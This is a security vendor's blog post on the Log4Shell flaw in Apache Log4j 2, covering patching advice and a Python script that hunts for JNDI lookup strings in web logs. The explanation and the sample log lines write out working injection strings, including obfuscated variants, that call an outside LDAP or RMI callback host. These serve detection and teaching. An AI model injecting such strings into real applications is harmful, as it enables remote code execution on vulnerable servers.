
Just as people were starting to turn their attention to the upcoming holidays, the cybersecurity world received an unwelcome end-of-year surprise over the weekend: the critical RCE vulnerability CVE-2021-44228, now referred to as Log4Shell. The vulnerability affects Apache Log4j 2, a very widely used Java logging library.
Log4Shell carries the highest possible CVSS severity rating of 10.0. Its potential blast radius is enormous because of the millions of applications and products that embed Log4j, and because the exploit is trivial. An attacker only needs to get a string such as ${jndi:ldap://attacker-host/a} into any value the application logs (a username, a User-Agent header, a chat message); a vulnerable Log4j version resolves the lookup, fetches an attacker-controlled Java object over JNDI, and executes it. One widely shared demonstration by a researcher at Huntress showed the chat function in the video game Minecraft being used to detonate a payload on computers connected to the server.
The vulnerability is easily weaponized to take control of a system. It remains to be seen which attack types will dominate, as opportunistic attackers have so far been scattershot in their early activity.
Before we go any further, we should make it clear that no D3 software uses Apache Log4j, so our products are not affected by Log4Shell. Our clients can continue to use D3 SOAR safely.
However, because Log4j is ubiquitous in SaaS tools and enterprise software, many people are wondering what they can safely keep running. Companies don't always know exactly which of their assets use a particular component like Log4j.
For companies who don’t know which of their systems are vulnerable, a list of products affected by Log4Shell can be found here.
Huntress has also created a Log4Shell Vulnerability Tester that can be used to identify vulnerable applications.
Companies should apply the latest updates to any affected systems. Organizations that use Log4j 2 must immediately update to Log4j 2.15.0 or later: versions 2.0-beta9 through 2.14.1 are vulnerable, and later 2.x releases superseded 2.15.0 once follow-on issues were found, so apply the newest 2.x release rather than stopping at 2.15.0. Forrester's Allie Mellen recommends creating a patching strategy that updates the highest-risk systems first, meaning those that are internet-facing or that log untrusted input. For systems that cannot be patched right away, our partners at Cybereason have made a "vaccine" freely available that disables the vulnerable lookup behaviour; treat it as a stopgap, not a substitute for patching.
Microsoft has also published a series of workarounds that can help mitigate risk.
Forrester also recommends updating your web application firewall rules to block exploit attempts, with the understanding that this will be an iterative process: attackers quickly began obfuscating the ${jndi: string with nested lookups such as ${${lower:j}ndi:...}, so no set of rules will perfectly address every variant. Because cryptomining has been a common goal of early Log4Shell attackers, companies can also conduct threat hunting focused on evidence of cryptojacking (unexpected CPU load, outbound connections to mining pools) to proactively find signs of compromise.
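The following is an added illustration of the hunting logic described above; it is not D3, Forrester or Huntress tooling. It scans web-server log lines for Log4Shell lookup strings, first collapsing the obfuscations attackers use (nested ${lower:...}/${upper:...} lookups and the ${key:-default} fallback syntax, e.g. ${::-j}) so that a rule keyed on the literal "${jndi:" is not trivially bypassed. The sample access-log lines and IP addresses are constructed for the example.

```python
"""Hunt for Log4Shell (CVE-2021-44228) lookup strings in log lines.

Added illustrative example, not vendor tooling. Normalizes common lookup
obfuscations before matching, because a rule that only looks for the literal
"${jndi:" misses ${${lower:j}ndi:...} and ${::-j}${::-n}di:... variants.
"""
import re

# Innermost ${...} lookup: the body contains no further '$', '{' or '}'.
INNER = re.compile(r"\$\{([^${}]*)\}")
# After normalization: a JNDI lookup followed by a URL scheme, e.g. ${jndi:ldap://...}
JNDI = re.compile(r"\$\{jndi:([a-z0-9+.-]+):", re.IGNORECASE)


def _resolve(body: str):
    """Resolve one innermost lookup body to the text Log4j would substitute.

    Returns None for lookups not modelled here (jndi, date, ...), which are left in place.
    """
    if body.lstrip().lower().startswith("jndi"):
        return None                       # never rewrite the payload itself
    if ":-" in body:                      # ${key:-default} with unset key, e.g. ${::-j} -> "j"
        return body.split(":-", 1)[1]
    kind, sep, arg = body.partition(":")
    if sep:
        if kind.lower() == "lower":
            return arg.lower()
        if kind.lower() == "upper":
            return arg.upper()
    return None


def normalize_lookups(text: str, max_rounds: int = 25) -> str:
    """Collapse inner lookups repeatedly until nothing changes (bounded for pathological input)."""
    for _ in range(max_rounds):
        changed = False

        def repl(m):
            nonlocal changed
            out = _resolve(m.group(1))
            if out is None:
                return m.group(0)
            changed = True
            return out

        text = INNER.sub(repl, text)
        if not changed:
            break
    return text


def scan_line(line: str):
    """Return (scheme, normalized_line) if the line carries a JNDI lookup, else None."""
    normalized = normalize_lookups(line)
    m = JNDI.search(normalized) or JNDI.search(line)
    if not m:
        return None
    return m.group(1).lower(), normalized


def scan_lines(lines):
    """Scan log lines; returns [(1-based line number, scheme, normalized line)] for each hit."""
    hits = []
    for n, line in enumerate(lines, start=1):
        r = scan_line(line)
        if r:
            hits.append((n, r[0], r[1]))
    return hits


# Constructed sample access log (Apache combined format); line 1 and line 5 are benign.
SAMPLE_LOG = """\
203.0.113.7 - - [10/Dec/2021:14:02:11 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.8 - - [10/Dec/2021:14:02:13 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://203.0.113.99:1389/a}"
203.0.113.9 - - [10/Dec/2021:14:02:15 +0000] "GET /login HTTP/1.1" 200 512 "-" "${${lower:j}ndi:${lower:rmi}://203.0.113.99:1099/b}"
203.0.113.10 - - [10/Dec/2021:14:02:17 +0000] "POST /api HTTP/1.1" 200 512 "-" "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://203.0.113.99/c}"
203.0.113.11 - - [10/Dec/2021:14:02:19 +0000] "GET /search?q=${date:yyyy} HTTP/1.1" 200 512 "-" "curl/7.79"
"""

if __name__ == "__main__":
    for n, scheme, norm in scan_lines(SAMPLE_LOG.splitlines()):
        print(f"line {n}: jndi via {scheme}: {norm}")
```

The normalizer only models the lookups attackers actually use for obfuscation; anything else (including the ${date:...} on the benign line) is left untouched, so the benign line is not flagged. Run it over real access, application and proxy logs, and feed the extracted callback hosts (the ldap/rmi/dns targets) into your blocklists and your cryptojacking hunt.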
If the exploit is used to enact malicious activity such as cryptojacking or deployment of malware, D3 NextGen SOAR can help manage those alerts via our codeless playbooks and extensive integrations.
The situation is developing quickly, with cybersecurity experts around the world sharing resources and knowledge to help organizations and individuals mitigate risk. Keep an eye on the sources we’ve shared, as well as security communities on Reddit and Twitter to stay apprised of the latest developments.